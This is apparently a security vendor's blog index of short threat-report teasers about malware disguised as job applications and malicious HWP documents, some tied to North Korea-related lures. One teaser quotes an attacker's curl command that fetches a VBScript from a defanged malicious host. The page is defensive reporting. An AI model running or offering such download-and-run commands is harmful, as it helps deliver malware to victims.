Malware Being Distributed Disguised as a Job Application Letter
Malware

Malware Being Distributed Disguised as a Job Application Letter

AhnLab Security Emergency response Center (ASEC) has identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes including a process with AhnLab’s product name (V3Lite.exe) and is being distributed through malicious

  • Jun 01 2023
HWP File Disguised as Personal Profile Form (OLE Object)
APT

HWP File Disguised as Personal Profile Form (OLE Object)

The ASEC analysis team has recently identified a malicious HWP file that exploits OLE objects and flash vulnerabilities. The file uses a malicious URL identified in 2020. This URL contains a flash vulnerability (CVE-2018-15982) file, which requires users to take caution. The identified HWP file includes OLE objects, and the

  • Aug 29 2022
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object)
APT

Malicious HWP File Disguised as a Happy Birthday Message (OLE Object)

The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl  -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c

  • Aug 23 2022
Malicious HWP Files with BAT Scripts Being Distributed Actively (North Korea/National Defense/Broadcasting)
APT Malware

Malicious HWP Files with BAT Scripts Being Distributed Actively (North Korea/National Defense/Broadcasting)

The ASEC analysis team has discovered the active distribution of APT files that are exploiting a feature of HWP files (OLE object insertion) recently. After the case introduced in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” on March

  • Jun 10 2022
North Korea-related Hangul Word Processor (HWP) File Being Distributed
APT Malware

North Korea-related Hangul Word Processor (HWP) File Being Distributed

The ASEC analysis team has recently discovered that North Korea-related HWP file was being distributed. The operation method is not through a vulnerability, but instead, a hyperlink is inserted on the screen the user is exposed to upon running the file, prompting the user to click, and upon clicking, executables

  • Dec 24 2021
Distribution of Hangul Word Processor (HWP) File with Title of North Korea-related Question
APT Malware

Distribution of Hangul Word Processor (HWP) File with Title of North Korea-related Question

Previously, ASEC analysis team discovered the surge in the distribution of malicious Word files containing North Korea-related materials and shared detailed information about this trend. And today, ASEC analysis team has discovered the distribution of malware disguised as HWP files that contain North Korea-related questions. Judging by the information within

  • Apr 09 2021